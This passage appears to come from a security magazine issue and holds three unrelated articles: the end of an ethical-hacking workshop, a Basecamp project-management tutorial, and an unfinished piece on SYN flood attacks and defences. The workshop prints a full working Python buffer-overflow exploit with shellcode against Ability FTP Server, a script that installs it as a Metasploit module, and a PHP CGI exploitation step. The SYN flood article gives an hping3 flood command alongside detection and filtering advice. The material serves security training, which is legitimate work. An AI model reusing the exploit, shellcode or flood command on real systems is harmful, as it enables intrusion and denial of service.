You can see the same results via the Metasploit command line, but the results would be in raw format, as shown in the snapshot below, by using the "vulns" command. We used the search switch to look for all "mysql" vulnerabilities discovered in this scan. So far in this module, you have practiced the "Ethical Hacking" methodology that you studied earlier; now it's time to complete the hacking attempts by exploiting the vulnerabilities. This workshop will exploit selected vulnerabilities; you should review the report and the discovered vulnerabilities in detail to gain more knowledge and understanding of the ethical hacking lifecycle.

Exploiting Vulnerabilities

Among the discovered vulnerabilities, the ones selected for this exercise are as follows.
1. Ability FTP Server on Windows
2. Apache on Linux

As shown in the above snapshot, a NeXpose scan was launched again separately for the Windows machine, and the scan results are shown below. Among the discovered vulnerabilities, the Golden FTP bug was selected to demonstrate the exploitation in order to hack into the Windows machine.

Hacking into Windows Machine

We exploited the Ability FTP Server with our own exploit written in Python; if you want to learn more about this, please complete the workshop "Advanced Exploitation Techniques". Below is the exploit code we have written. Shortly you will learn how you can develop your own Metasploit Framework module for this exploit.
# Python 2 script as written for the workshop: str literals are byte strings,
# so the shellcode can be concatenated and sent as-is.
import socket
import struct

# junk data equal in size to the offset detected at 968 bytes, after which EIP is overwritten
junk = "\x41" * 1000
# we subtracted 32 bytes from the original offset as we will be adding our egg hunter code, which is 32 bytes
junk1 = "\x41" * 936
# nops to clean up any garbage values in the stack -- this is called padding and it's very effective
nops = "\x90" * 26
# egg hunter created with mona.py with tag w00t
egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg_hunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# stack address to jump to
retaddress = "\x99\xC0\x96\x7C"
# Stage 2 shellcode, which is the actual larger shellcode to be executed by our egg hunter code
buf = ""
buf += "\xdb\xdc\xd9\x74\x24\xf4\xba\xda\x88\x04\xa1\x5e\x2b"
buf += "\xc9\xb1\x56\x31\x56\x18\x03\x56\x18\x83\xc6\xde\x6a"
buf += "\xf1\x5d\x36\xe3\xfa\x9d\xc6\x94\x73\x78\xf7\x86\xe0"
buf += "\x08\xa5\x16\x62\x5c\x45\xdc\x26\x75\xde\x90\xee\x7a"
buf += "\x57\x1e\xc9\xb5\x68\xae\xd5\x1a\xaa\xb0\xa9\x60\xfe"
buf += "\x12\x93\xaa\xf3\x53\xd4\xd7\xfb\x06\x8d\x9c\xa9\xb6"
buf += "\xba\xe1\x71\xb6\x6c\x6e\xc9\xc0\x09\xb1\xbd\x7a\x13"
buf += "\xe2\x6d\xf0\x5b\x1a\x06\x5e\x7c\x1b\xcb\xbc\x40\x52"
buf += "\x60\x76\x32\x65\xa0\x46\xbb\x57\x8c\x05\x82\x57\x01"
buf += "\x57\xc2\x50\xf9\x22\x38\xa3\x84\x34\xfb\xd9\x52\xb0"
buf += "\x1e\x79\x11\x62\xfb\x7b\xf6\xf5\x88\x70\xb3\x72\xd6"
buf += "\x94\x42\x56\x6c\xa0\xcf\x59\xa3\x20\x8b\x7d\x67\x68"
buf += "\x48\x1f\x3e\xd4\x3f\x20\x20\xb0\xe0\x84\x2a\x53\xf5"
buf += "\xbf\x70\x3c\x3a\xf2\x8a\xbc\x54\x85\xf9\x8e\xfb\x3d"
buf += "\x96\xa2\x74\x98\x61\xc4\xaf\x5c\xfd\x3b\x4f\x9d\xd7"
buf += "\xff\x1b\xcd\x4f\x29\x23\x86\x8f\xd6\xf6\x09\xc0\x78"
buf += "\xa8\xe9\xb0\x38\x18\x82\xda\xb6\x47\xb2\xe4\x1c\xfe"
buf += "\xf4\x2a\x44\x53\x93\x4e\x7a\x74\x67\xc6\x9c\x10\x77"
buf += "\x8e\x37\x8c\xb5\xf5\x8f\x2b\xc5\xdf\xa3\xe4\x51\x57"
buf += "\xaa\x32\x5d\x68\xf8\x11\xf2\xc0\x6b\xe1\x18\xd5\x8a"
buf += "\xf6\x34\x7d\xc4\xcf\xdf\xf7\xb8\x82\x7e\x07\x91\x74"
buf += "\xe2\x9a\x7e\x84\x6d\x87\x28\xd3\x3a\x79\x21\xb1\xd6"
buf += "\x20\x9b\xa7\x2a\xb4\xe4\x63\xf1\x05\xea\x6a\x74\x31"
buf += "\xc8\x7c\x40\xba\x54\x28\x1c\xed\x02\x86\xda\x47\xe5"
buf += "\x70\xb5\x34\xaf\x14\x40\x77\x70\x62\x4d\x52\x06\x8a"
buf += "\xfc\x0b\x5f\xb5\x31\xdc\x57\xce\x2f\x7c\x97\x05\xf4"
buf += "\x8c\xd2\x07\x5d\x05\xbb\xd2\xdf\x48\x3c\x09\x23\x75"
buf += "\xbf\xbb\xdc\x82\xdf\xce\xd9\xcf\x67\x23\x90\x40\x02"
buf += "\x43\x07\x60\x07"

# arranging the stack: padding, egg hunter, return address, short jump back, then the egg and stage 2
myStage1 = junk1 + egg_hunter
myStage1 += retaddress + "\xEB\xC4"
myStage2 = "w00tw00t" + nops + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.81.140', 21))  # hardcoded IP address of the host running Ability Server
s.recv(1024)
s.send('USER ftp' + '\r\n')  # login with ftp as user
s.recv(1024)
s.send('PASS ftp' + '\r\n')  # authenticate with ftp as password
s.recv(1024)
s.send('APPE' + myStage1 + myStage2 + '\r\n')  # evil buffer
s.recv(1024)
s.send('QUIT\r\n')
s.close()

Now, to import this as a module into Metasploit, we will first fuzz the Ability server with our Python fuzzer and then use Immunity Debugger to generate the Metasploit exploit code, which we will customize for our use. The fuzzing steps are shown sequentially in the snapshots below, in which the FTP server was fuzzed and then "mona.py" was used to generate the Metasploit code for us. You can find the exploit module in the Immunity directory, and the initial code would look like the one shown below.
The code would look like this:

You should now customize the details that you feel are mandatory as per the vulnerability discovery; you can also customize the information section of this module, and then import it into the Metasploit Framework by copying the module into the directory shown below. Name the module so that you can easily find it in a search; in this case, we will name it "ralab_ability.rb". Before you add this module into the Metasploit Framework, note down the exploit count as shown in the snapshot below; the total number of exploits available in Metasploit is 1409. Copy the module you have just created into the directory shown in the snapshot below. Now run the "reload_all" command on the Metasploit console; this will reload all modules, and you should check the exploit number. It should be one more than the previous total number of exploits; in our case, it incremented to 1410 as shown below. Now search for your exploit in the Metasploit Framework; search with "ralab" and you should be able to see the exploit available, as shown below. Use this exploit to hack into the Windows machine running the Ability server; however, you need to customize the exploit and add mandatory requirements, like the "register" function requirements for adding the login/password options for the exploit and setting up the buffer space. Alternatively, you can use the already customized exploit available in the Metasploit Framework to hack into the Windows machine.

Hacking Linux Machine

In the Metasploit Framework, we looked for the "PHP CGI Argument Injection Vulnerability" as shown below. We set the target to our Linux machine on 192.168.81.138 and exploited this bug. And very easily we got the Meterpreter session.
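The module installation and the 1409-to-1410 check described above, as an added example that is not the workshop's own code: it syntax-checks the module file, copies it into the module tree, and confirms the exploit count rose by exactly one before asking msfconsole to reload and search. The module directory /usr/share/metasploit-framework/modules and the exploits/windows/ftp placement are assumptions (the article shows the directory only in a snapshot); ralab_ability.rb is the file name the article chooses.

```shell
#!/bin/sh
# Added example, not the workshop's own code: install a custom exploit module
# and verify the module count goes up by exactly one, the check the article
# performs by reading the msfconsole banner before and after "reload_all".
# Assumptions: Kali 1.x framework module tree below; placement under
# exploits/windows/ftp chosen for an FTP server exploit.

MSF_MODULES="${MSF_MODULES:-/usr/share/metasploit-framework/modules}"  # assumed path
MODULE_SUBDIR="exploits/windows/ftp"                                   # assumed placement

# Number of exploit module files below a modules directory.
count_exploit_modules() {
    find "$1/exploits" -type f -name '*.rb' 2>/dev/null | wc -l | tr -d ' '
}

# Syntax-check a module before copying it in: a broken file makes reload_all
# print a load error instead of adding the module.  Skipped if ruby is absent.
check_module_syntax() {
    if command -v ruby >/dev/null 2>&1; then
        ruby -c "$1" >/dev/null
    else
        echo "ruby not found, skipping syntax check for $1" >&2
    fi
}

# Copy the module into place and print "<before> <after> <delta>".
install_module() {
    src=$1; modules=$2
    check_module_syntax "$src" || return 1
    before=$(count_exploit_modules "$modules")
    mkdir -p "$modules/$MODULE_SUBDIR"
    cp "$src" "$modules/$MODULE_SUBDIR/$(basename "$src")"
    after=$(count_exploit_modules "$modules")
    printf '%s %s %s\n' "$before" "$after" $((after - before))
}

# Make msfconsole pick the file up and list it, as the article does with
# "reload_all" followed by a search for "ralab".
reload_and_search() {
    msfconsole -q -x 'reload_all; search ralab; exit'
}

# Usage on the Kali box: sh install_module.sh install ./ralab_ability.rb
if [ "${1:-}" = "install" ] && [ -n "${2:-}" ]; then
    install_module "$2" "$MSF_MODULES"
    reload_and_search
fi
```

Counting files rather than reading the banner makes the "one more than before" check independent of msfconsole's output format, and the syntax check catches the most common reason the count fails to increment.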
We hope this has been informative for you, and we would like to thank you for completing this workshop.

Basecamp – Project Management for the Sane
by Troy Hipolito

Download the latest ISO Interactive white paper. There you will find a company description, capabilities, visuals, development process, case insights, and technology definitions.
• ISO White Paper: www.isointeractive.com/pdf
• ISO Video: www.isointeractive.com/#showreel
• ISO Website: www.isointeractive.com

ISO Interactive are award-winning consultants that build engaging mobile and web experiences. Known for small to large opportunities using Unity, Flash, HTML5 and traditional web programming, they have built very cool virtual worlds, 3D simulations, mobile apps, social games and web designs.

Overview

In this tutorial, we will dive into a basic understanding of Basecamp (a project management tool we use), as well as learn how to get up to speed quickly so that you can start realizing the benefits of the program, among which are centralizing communications, reducing the frequency of meetings, facilitating team coordination on projects, and providing transparency on timelines.
We have more detailed information concerning the project management role and the methods that work best for your organization in my previous article, located at http://sdjournal.org/download/2011-pentestextra-issues/. Feel free to check it out, as there is good information on project management organization and methods.

Speaking of which, project management is one area we have a lot of experience in. We believe project management is a major factor in determining the success of a project. This is especially true for complex and technical endeavors. Now, I am not taking anything away from great designers and developers, but having them is more of a norm. Great designers and developers need unification and sometimes direction to keep goals, budgets and timelines reasonable. Our groups have worked in corporate as well as agency scenarios. To be honest, we favor the agency style, as it has more of a startup feel and allows us to get our hands dirty. This allows some control to drive tasks and better target success. Corporate project management, in our view, is more about reporting to a number of bosses than actual management. It's different due to the structure and size of the client/partner.

The good people at 37signals have revamped their popular project management software, Basecamp. Previously we produced a popular project management article for the Software Developer's Journal that touches on the old version of the software. More specifically, it is the cover article for the Flash & Flex magazine in 2011. So we have actually touched on some of that information, but now we will concentrate on an in-depth tutorial of the new version of Basecamp. This tutorial is divided into several sections, starting with the basic Why Basecamp?, followed by a description of the various features and capabilities of Basecamp. The third section will cover usage instructions and guidelines, from identifying project scope to replying to Basecamp messages.
The final section covers the conclusion.

Why Basecamp?

You may be wondering why we use Basecamp versus another tool. Well, we actually do use other tools depending on the client/partner/requirements. There are many great online tools out there, for example Jira, MS Project, Asana and RallyDev. Some of these are more feature-rich with true Agile processes, while others have a very specific set of functions. At ISO the main focus is to produce a high-quality product with the least amount of drama. That may not sound completely intuitive, but if you think about it, everything is about making things flow and reducing drama. Controlling costs is actually a byproduct.

The best designers and developers are sometimes a pain in the butt (not all, but most). You know what I'm talking about: acting like they just hit puberty, not making their deadlines (that they committed to), getting their feelings hurt easily, whining, crying and all that nonsense. And they have to be managed without them pooping their pants and walking out of the job because they aren't doing what they said or aren't getting their way. My goodness, it is a pain to manage, but absolutely needed.

While generally we "try" to adopt more agile processes, we are bound by the rapidly changing needs of the business, which can grow in volume at a rapid pace. Our focus is directed by numerous initiatives that result in a compound of projects with a pairing of unique groups. Planning projects around Agile-style "sprints" (i.e., a guaranteed amount of time) is not always possible and more often not probable. Basecamp is often more suitable for many of our needs because it is task-oriented and date-driven. Another great benefit of Basecamp is that it's an entirely online, secure desktop tool. Basecamp also offers a mobile app. Additional highlights the program offers:
• Centralizing communication for emails based on the project, conversation thread and assigned tasks.
• Uploading and tagging files associated with a particular project. Typically, these are items like Word documents, spreadsheets, images, PSDs and PDFs.
• Setting up and tracking schedules for development, meetings, and handoffs.

The key to success when using Basecamp is for everyone to actually use it for the tasks at hand. Otherwise, there will be no record of any tasks being worked on. This can easily degenerate into halting progression to the next step of the project, delays in securing approvals and handing off to other departments, and failure to meet deadlines. In short, not communicating properly within Basecamp about your project tasks can jeopardize launch dates. So think of Basecamp as a handy organization tool that allows your team to be more efficient and enhances productivity.

On to our review of Basecamp! The following are the six (6) main sections found under the Projects menu in Basecamp:
• Projects
• Calendar
• Everything
• Progress
• Everyone
• Me

Projects Menu

When you log in to Basecamp, you are directed to the main page, where you are able to see all of the projects available. From here you can select the project you want, change the view of how you want to see projects, "star" projects that pertain to you, and even create new projects via a template or from scratch. On this page there is also a little search box that allows you to find things quickly. There are a number of projects in the queue at any given time. To find a particular project, simply scroll up or down until you find what you need. You'll also have the option to change the view from "graphical" to "hybrid" to "textual" by using the icons on the left of the screen (below the New Project link). If you like to read through the list quickly, you may want to use the "textual" view.
If you want to group the projects which are specifically assigned to you, simply click on the "star" for those projects and they will all be moved up together to the top. Additionally, if you want to look for a project that you know is finished but can't find the name, click the archived projects link on the top right to see a listing of those projects.

Individual Project "Project Name"

Each project has a number of components. Clicking on a project, you will notice menu links/sub-sections for Project Landing Page, Discussions, To-dos, Files, Text Documents and Events.

Project Landing Page

The title of the project is the link to the project landing page. These pages are useful for viewing recent activity on the other subsections. From top to bottom it has the latest project updates, Discussions, To-do lists, a visual of the Files uploaded and the newest Text Documents. All content from these subsections displayed on the project landing page links directly to those details. Next, let's take a look at the definition of most of these titles.

Discussions

Discussions serves as a type of "centralized" email inbox. Typically, Discussions are not directly tied to to-dos. These are used for emails which may deal with internal approvals and general notes that may or may not pertain to current tasks. Each discussion can have its own thread. For example, "discussions" can be used to post project notes.

Starting a Discussion

To start a discussion, log in to your Basecamp project and click on the "post a new message" button. There you have the Subject line and the message area. You can format with the tools available and, if needed, upload a file. Make sure you DO NOT email everyone. No one likes spam. Please only click on the individuals that need to know. There is more on this and other etiquette items in the How We Use Basecamp section.
Once they receive a Basecamp message, individuals can simply email back from their native email client or click the "view on Basecamp" link within the email to reply. Viewing from Basecamp will allow the entire conversation thread to be reviewed. Lastly, you can attach files as needed in discussions.

To-do lists

To-dos are a vital part of Basecamp. They are what generates the Calendar, assigns tasks to individuals and denotes important events. It is basically an adjustable task list with due dates. Within the following image there is an "Add a to-do list" button, the title of a current to-do list and individual to-dos/tasks. On the right side there are the view options (show assigned to, show when it's due, show completed, and individual to-do lists). Basecamp allows for numerous lists. Typically, depending on the type and size of the project, you may want to break it up. At this time, however, our projects are fairly small, so we prefer a more linear approach. It is simpler for our current needs.

The previous image displays individual to-dos that can have a few pieces of additional information. Normally a to-do has a description, due date and the person the task is assigned to. If there are any comments relating to this to-do task, you will see a note following the to-do task description. Once the to-do task is completed, the assigned person or project manager can check it off (with the check button). In order to view a comment, just click on it. Comments are very good if the short description does not have enough detail. However, for our projects we add some additional info. In each of our to-do items we have the subject (e.g. Comps), short description, percentage complete, date or date range, separate due date and the person the task is assigned to. In the example below, the original description was reduced to "UX > set 1". In this case, we added comments for further clarification.
Selecting a to-do task (that has comments) will display all the comments in thread fashion. This is very similar to how the message conversations are done. The viewer will also be able to select to whom to email the message. The purpose is to have the person assigned be responsive regarding the progress of their task and to centralize related conversations. Only conversations that pertain to this to-do task should be added here. There is also an option to email people outside of Basecamp who are not part of the project. However, that is not recommended for our production flow. Once individuals receive a message, they can simply reply via their email client or from Basecamp. It is usually better to email back via Basecamp if you feel that you want to read part of or the entire thread.

Going back to the additional info we added, let's talk about the percentage item (e.g. [30%]). This info can be added manually in Basecamp by the person performing the task, as well as by the project manager. This is done by moving your cursor over the to-do task and then selecting the "edit" option. This allows everyone to quickly see how much of the task is considered completed. Formatting it this way also has some major advantages. That piece of information, along with the due date, is pulled into a visual Gantt chart/timeline called TeamGantt.

Gantt Chart

This is separate online software that is very useful for visual teams. The project manager can invite the same people on the project from Basecamp to TeamGantt. TeamGantt uses the percentage info provided to show completion of the task. The beginning and end dates in the to-do task description are just a reference so we can visually adjust the timeline. But adding the time range in textual format makes it easy to read, and that is the important thing.
TeamGantt also has some neat printing features, associating tasks with each other and even color-coding groups of tasks. As such, if designing comps is dependent on wireframes, you can link them together visually. In this case, I have made all the comp-related items a fuchsia, or "hot pink", color. So all the comp-driven tasks are one color, UX-related another color, and so on. A couple of other neat features allow the project managers or individuals with edit permissions to send notes to the tasks from both Basecamp and TeamGantt. It is just a little option that helps get things done quickly.

Calendar

For the most part the Calendar is pretty self-explanatory. There are some automatic things it provides, as well as features that can be used. Below is a screenshot. To the left of the screenshot, the Calendar shows all the events relating to the projects you are involved with. Be aware that the complete view is on by default, and it may become too much information unless you turn off projects you are not focusing on. If that is the case, just click the little colored circle with the check mark in order to turn the visibility of the related tasks on or off in the calendar. What you see in the larger portion of the calendar are all the to-dos posted by due date. A user can also use this to check off work. Besides the normal to-do items, individuals can also add their own entries and associate them with any accessible project. These, however, do not create a to-do item but, rather, only create a calendar event. Our group uses Google Calendar, so we may not use this as often. However, it may be useful to add events if it helps to keep track of events on an individual basis. The following image shows how to create an event. You can add an event by clicking on any of the calendar days.
You can add the event's title and additional notes to the desired calendar, and you can even adjust the event to span multiple days if needed and then email your colleagues.

Everything

"Everything" is an easy way to browse all items in their respective groups. This section has Browse every discussion, Review all open to-dos, See every single file, Read all text documents, Show all forwarded emails and See all deleted items. These are just other ways to find information quickly. To provide a quick breakdown:
• Browse every discussion > Provides a listing of any/all textual updates in the order they were added. You can get to that discussion and its associated project by selecting it.
• Review all open to-dos > Provides access to all the to-dos (that you have access to) that have not been checked off. Again, you can link to the exact to-do within the project by clicking on any of the items on the page.
• See every single file > Provides access to all uploaded files for all the projects to which you have access. Useful if you have a lot of projects and you want an overview of all uploaded files, etc.
• Read all text documents > Shows all documents based on the last update.
• Show all forwarded emails > For emails that have responses from outside of Basecamp. We probably will not have a need for this.
• See all deleted items > Anything that has been deleted. This is also not used very often.

Progress

Shows who did what in the order it happened. This comes in very handy when you want to find out about any activity of the last few days. Beyond that it may present too much info. The Progress section also gives a good indication of who is using Basecamp and how. You can scroll down and review the messages, files and happenings in real time.

Everyone

This section shows everyone, ordered by the last active individuals.
Latest active individuals are posted first. You can see everyone by clicking the “See all people” link on the bottom left of the screen. Incidentally, “admins” can add additional people, change access permissions and perform other administrative functions.

Me

The “Me” section can be very helpful to quickly see everything on your plate. It provides access to all the latest activity across all your projects, all your open to-dos, recently completed to-dos and files you have shared. This should actually be the first place you go in the morning to see if it lines up with what you know needs to happen.

How We Use Basecamp (Usage Guidelines)

This is so important we made it a major section in the article. Proper etiquette comes into play when we think of how our actions affect the team and timelines. Basecamp is pretty much an open system. We can use it the way we like. We as a group need to form and follow a sort of protocol or “etiquette” which will help everything start to make sense and become more of a natural process. This process should include “when” and “how” we use Basecamp communications, as well as where information should be located. Basecamp is far from a perfect tool. It is up to everyone to use and tweak it as needed. At the same time, if we do not report to it, then the information will not be available for everyone else. An added advantage of properly and effectively using the system is that it will actually help reduce the need for some of the meetings and allow you to complete your work. The rules of today may be switched later for something that makes more sense. But for now these are the general usage guidelines.

Identifying Your Tasks

Tasks can be anything including replying to messages, reviewing documents, identifying dates and, yes, especially to-dos. One of the things we have to keep in mind is to look out for each other.
If you notice that there are tasks missing that will prevent you from doing your work (or dates that do not seem appropriate) then please let everyone else know. It probably has to be addressed. So, where do we start?
• First, go to the “Me” menu link. There you can see what tasks are assigned to you. This does not give you a clear priority, but it does show you all the things you are associated with. If you know there are tasks or projects that you have to do work on and they are not there, find out why. If it is not on Basecamp then others may not know it exists. Basecamp should be used as transparently as possible so others can quickly see how the project is going without the need for much interaction. Basecamp is designed to show you and others where you are in the process of your projects.
• Secondly (and this is optional): the START POINT project is a good place to go, as there is a to-do list called Priorities. There you can find your name and make notes on your goals for the day in order of importance. Creating this priority list helps you focus on the items needed. And we all know the focus can change at any moment. So feel free to update that to-do item with any updates.
• Once you are focused for the day, it is best to dive into the individual project you are working on. Based on the priority list you have created, go to the project you have to work on.

Identifying project scope and important files and links

Even after you have reviewed the project and your to-dos, do not overlook the possibility that there are times when context may be missing on the project or you may need access to some particular bit of additional information. This could be reference info, a “what the heck is this project about,” a list of who is on it, or information on how to get access to the needed file(s). It may just be that you need more details on the actual to-do/task...
Formatting explanation of the to-dos schedule

To make the to-dos a little more precise and at the same time keep the amount of content readable, we have implemented a subject formatting technique to assist in this matter. As we mentioned before, the to-dos are tasks that can also be arranged as a schedule (see section 1.3 for general details on to-dos). This subsection, however, is really designed to break down why we format it the way we do. Please note that not all to-do items may be formatted this way. However, if you have a series of tasks that form a schedule, then it is best to use these practices. To simplify the different styles, let’s call these series of tasks (to-do schedules) and non-series of tasks (one-offs or similar tasks). To illustrate the point, the images that follow are 2 different views of the same series of tasks. The first image is what you see from Basecamp, while the second is a more visual timeline generated in TeamGantt.

Series of tasks, Basecamp view

Most projects that require a series of tasks are broken up into usable chunks. They tend to include most of the larger events, but often meetings spring up for additional reviews or issues that are not related to the project. You can see this project is a little more complicated than most, but the basic structure is pretty standard. Typically, most projects have:
• BO (Business Owner) ZIP and CB (Creative Brief). In the example below it was already completed and checked off.
• Internal kick-off. Again, this already happened and has been checked off.
• UX development
• Content support
• Comps
• Internal reviews (sometimes these are not listed as the dates shift too often)
• Legal reviews
• IT Release
• UAT prep
• IT Dev
• UAT internal testing
• Launch
As you will notice, the following image has multiple releases. Sometimes this is needed if you are dividing design and development/IT groups.
Dev/IT may have to get started on a project overlapping the design schedule in order to make launch dates. Now that we have an idea of the different groupings, let’s consider formatting. If you take another look at the series of tasks shown above, you will notice that some have “++” in front of them and others do not.
• The “++” prefix generally represents a release or major meeting. These are what we call non-tasks, or things that do not require the online group to develop. Items without the “++” prefix generally represent UX design, content creation or comp design.
• You will also notice that we use the overarching subject first. So you may read things like UX, Content or Comps. Then you will notice a little arrow like this: “>”. After that comes a small amount of detail (just enough to understand what is being worked on).
• After the detail you will often see a date or date range. For events that take one day, a simple date is needed, while for events spanning a period of time it is good to put the date range in the description. This is important because Basecamp only tracks end dates. We want to show the start and end dates.
• After the date or date range you may see a percentage in brackets like this: [50%]. This is manually filled out so we get an idea of where this task is in the process. It is also auto-translated visually in the Gantt chart in TeamGantt. And if the description is a bit vague, that is when you add a comment to it. That way anyone looking at this particular to-do can see that there is a comment which can be clicked on to drill down and see additional details.
• Then the task is assigned to someone and given a due date. You may be curious why there is both a date range and a due date. For starters, while due dates are tracked in the system, we format these dates visually to make it easier to read and identify start dates. Also, TeamGantt has start dates as well as end dates.
It is easier to adjust the start in TeamGantt once you can actually read the date ranges in the description. So let’s use this example and break it down.

Comps > set 1 > see comments > 8/12 – 8/15 [0%] 1 comment Person Name Mon Aug 11

• Comps = Overall subject.
• set 1 = Short detail.
• see comments = A note signifying that more details on the task are to be found in the comments.
• 8/12 – 8/15 = Start and end date (note we will probably have several internal approval meetings in between these dates that may or may not be notated on the schedule).
• [0%] = The estimated percentage of task completion.
• 1 comment = Shows how many comments are associated with this task.
• Person Name Mon Aug 11 = Who is assigned (and who emails default to), and when that task is due.

The TeamGantt project is just pulling the Basecamp information, providing a visual reference of the time it takes to complete a task (start and end date), a visual percentage of completion, and some of the same tools that Basecamp has. To simplify, the Project Managers generally set up the permissions for TeamGantt to be “view only.” This is so individuals do not have to try to adjust things from there. But the Project Managers do have the ability to create messages and tasks from there if they choose (or need) to. The Project Managers also try to color-code 4 different types of tasks:
• Non-tasks (the ones with the “++” prefix): a default powder blue
• UX: light orange
• Content: orange-red
• Comps: a hot pink/fuchsia color
In the previous graphic you will notice that a few UX tasks are 95% done. The timeline item for each of those tasks is actually 95% full. This is a visual indicator of where the task is.

Non-series set of tasks

The following image is an example of a non-series set of tasks. These are things like one-offs or recurring tasks.
The non-series tasks are usually simple, yet explain things when possible in the subject-first type of formatting.

When to use regular email vs. Basecamp messages/to-dos

There are lots of messages that do not have to be tracked or which don’t specifically pertain to a task. If this is the case, you don’t have to use Basecamp. You will have to decide if you want the message to be seen by others or not. We try to streamline whenever possible but also communicate enough to complete the tasks and “asks” at hand. These are some examples of what not to post on Basecamp: “Hi John – how was your weekend?”, “I did not like the meeting and thought it was a bad idea” or “I am concerned I committed to a deadline I can not reach.” These are examples of messages or personal conversations that should be handled outside of Basecamp. Also, if we are emailing other people outside of Basecamp, we should just use an email. They will not know what the email is if it is coming from the Basecamp system.

Replying to Basecamp messages/to-dos

One obstacle we tend to run across is that we do not always understand that a Basecamp-generated email is an email that requests a reply. If emails are not acknowledged then it can have an adverse effect when trying to finish projects in a timely manner. As such:
• Always direct the email to the main person when applicable. For example: if you are sending out a message and have selected several individuals to receive it, please direct the message to the individuals by adding an @ symbol followed by the person’s name. It will end up looking something like this: @Jon. That way, once they receive the email, the first thing they will see is who the email is focused on.
• Please reply to Basecamp emails.
• Please start conversations on to-dos and messages on Basecamp (when appropriate).
For more information about general usage of Basecamp messages and to-dos, please view sections 2.2 and 2.3.

Conclusion

Basecamp is a tool that allows us to centralize conversations and helps build and maintain task-driven timelines. It can also be integrated with a number of other tools like TeamGantt, which allows us to visually see the timelines (beginning to end) and the percentage of items completed, offers certain print features and just allows the online group to quickly stay on track. Although Basecamp is a great tool to have, it only works well when people are consciously using it in a productive manner. This is a flexible system that requires a little manual work to keep things running smoothly. Just remember, you can also take a peek at the online help section where there are guides, videos and cheat sheets at: https://basecamp.com/help. I hope this article gives you the basics to help get projects done a little more efficiently and with more peace of mind. Having a sense of control and being able to confidently get things done and report positively to the client definitely makes your life easier. I like easy (Freudian slip). There are of course more advanced tools, but we have chosen Basecamp and related online applications because they are flexible enough for the projects we are working with, while easy enough for clients to respond to. All things are centralized and documented automatically in one place. And if the client responds, then you have a direction you can move towards to get closer to finishing the goals of the job. If anyone is interested in the work we have done, please take a gander at our site http://www.isointeractive.com as we have at least some of our public projects posted there. Mostly we deal with helping clients and partners fix or develop mobile apps, websites, software reviews/audits, games, 3D simulations, lots of specialty projects and good old web development. Typically they range from 10k to under a million USD.
A few links of interest:
• ISO White Paper: www.isointeractive.com/pdf
• ISO Video: www.isointeractive.com/#showreel
• ISO Website: www.isointeractive.com
Thank you and we look forward to continuing to contribute to the interactive community. If you have any needs or even just want to brainstorm, please feel free to connect.
• email: [email protected]
• skype: troyhipolito
• web: isointeractive.com
• facebook: facebook.com/ISOinteractive
• twitter: @isointeractive
• instagram: iso_interactive

About the Author

Troy Hipolito is the Senior Consultant at ISO Interactive (a consulting social and mobile game company that supports agencies for campaigns, Facebook games, iPhone Apps and that sort of thing).

Tackling SYN Flood attacks
by Ratan Jyoti

A TCP SYN flooding attack is a type of Denial of Service attack in which many bogus TCP SYN packets are originated.
During the normal three-way handshake between client and server, the client first initiates the connection with a TCP SYN packet, which the intended server answers with a SYN/ACK packet, and finally the client replies with an ACK packet to establish the connection.

Figure 1. A normal three way TCP Handshake

In a TCP SYN flood attack, the malicious client begins a three-way handshake which it never finishes. The client only sends TCP SYN packets and no final ACK packets, so the server reserves memory for each incomplete connection. By this process, the server’s memory fills with an increasing number of incomplete connections until the server can no longer accept other incoming requests (both genuine and malicious) for want of free memory. The goal of this simple technique is to deny TCP services to legitimate clients by creating a large number of half-open TCP connections that fill the host’s listen queue. Usually, these TCP SYN packets use counterfeit IP addresses to prevent detection, and because these IP addresses do not exist, no responses are returned to the server.

Figure 2. TCP SYN Flood Attack

A sample SYN Flood induction in Linux by hping3

Hping3 is a tool developed by [email protected] which can send custom, arbitrary TCP/IP packets to network hosts. Hping3 is a multipurpose tool which can be used to perform the following, among other things:
• Testing firewall rules
• Port scanning (basic and advanced)
• Testing network performance
• Trace routing
• Remote OS fingerprinting
• TCP/IP stack auditing
This tool can be used to induce SYN Flooding.
A sample SYN Flood attack input and output are demonstrated below:

Input:
    $ sudo hping3 -i u2 -S -p XX -c N IP_Address
    HPING IP_Address (eth0 IP_Address): S set, 40 headers + 0 data bytes

Output:
    --- IP_Address hping statistic ---
    N packets transmitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms

The above command sends TCP SYN packets to the IP_Address mentioned. Hping3 creates raw packets, which requires root privileges, and hence sudo is required. Here:
• -S – sets the SYN flag
• -p XX – denotes target port XX
• -i u2 – waits 2 microseconds between each packet
• -c N – the number of packets to send/receive, for sending N packets

hping3 works in multiple modes, which are:
    default mode  TCP
    -0 --rawip    RAW IP mode
    -1 --icmp     ICMP mode
    -2 --udp      UDP mode
    -8 --scan     SCAN mode

How to determine if a particular server is under a SYN Flood attack

Netstat in Linux is a simple tool by which it can be determined whether the server is under a SYN Flood attack or not. Let us consider a server which can handle ten thousand user requests per second.

Table 1. SYN Flood Attack analysis
Input: netstat -nap | grep SYN | wc -l
    Output             Possible SYN Flood attack status
    <1000              SYN Flood attack less likely
    >1000 and <5000    Possible SYN Flood attack
    >5000              SYN Flood attack

Anything more than 2000 user requests per second is abnormal and denotes a possible SYN Flood situation. A user request rate of a few hundred per second depicts the normal situation.

Ways to prevent/defend against SYN Flood attack

Filtering based on IP address

Ingress IP filtering at peripheral devices, such as the router, will decrease the chances of IP spoofing, which can induce a SYN Flood or similar attack. For example, the following ingress filter will be effective in tackling a SYN Flood attack:

Listing 3. A simple logic for filtering IP addresses
    IF request source IP is within X.X.X.0/N THEN allow the request.
    IF request source IP is anything else THEN deny the request.

A careful IP range needs to be configured based on trust levels. Deployment of filter devices and their position in the network is the key. The drawback is that a malicious attacker who uses compromised legitimate IP addresses and changes these legitimate sources frequently may be difficult to stop; such systems are difficult to tackle with IP filtering alone.

Increasing Transmission Control Block Backlog queue

